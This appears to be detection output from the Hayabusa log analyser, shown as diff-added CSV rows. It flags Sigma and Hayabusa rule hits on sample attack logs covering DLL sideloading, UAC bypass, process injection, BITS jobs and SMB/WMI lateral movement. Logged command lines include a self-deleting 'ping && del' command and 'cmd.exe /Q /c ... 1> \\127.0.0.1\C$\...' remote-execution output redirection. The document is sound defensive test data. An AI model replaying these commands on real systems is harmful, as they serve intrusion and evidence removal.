+2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0xa09d1 | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:33.449 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\wwlib.dll | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | LID: 0xa09d1 | PID: 2920 | PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 840 | PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:36.312 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: <unknown process> | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 840 | Tgt PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\explorer.exe"" | Process: C:\Windows\SysWOW64\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 6552 | PGUID: 747F3D96-D8EC-5F8A-0000-001094207300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Windows\SysWOW64\explorer.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 6552 | Tgt PGUID: 747F3D96-D8EC-5F8A-0000-001094207300,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,Evas | Exec,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1576 | PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,Exec,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:45.130 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 1576 | Tgt PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1680 | PGUID: 747F3D96-D8F5-5F8A-0000-00106B6F7300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe | URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe | URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Intel\wwlib.dll | Process: C:\Windows\Explorer.EXE | PID: 3364 | PGUID: 747F3D96-19FB-5F8B-0000-0010DB270A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: calc.exe | Process: C:\Windows\SysWOW64\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\ProgramData\Intel\CV.exe"" | LID: 0x8faa7 | PID: 1536 | PGUID: 747F3D96-1B5C-5F8B-0000-001006AF2100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca | Process: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 5912 | PGUID: 747F3D96-1B5C-5F8B-0000-0010A6E02100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | Process: C:\Windows\System32\RuntimeBroker.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:27:10.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HCJVGQ5XQYJQFTRJAKRF.temp | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:27:10.791 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:52:31.218 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57238 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\7okjer.dll | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:52:34.966 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57239 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:01.646 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57240 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:04.161 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57241 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:04.924 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57242 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2628 | PGUID: 747F3D96-75D1-5F8B-0000-00109EB23300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.633 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 4864 | PGUID: 747F3D96-75D1-5F8B-0000-001061BD3300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
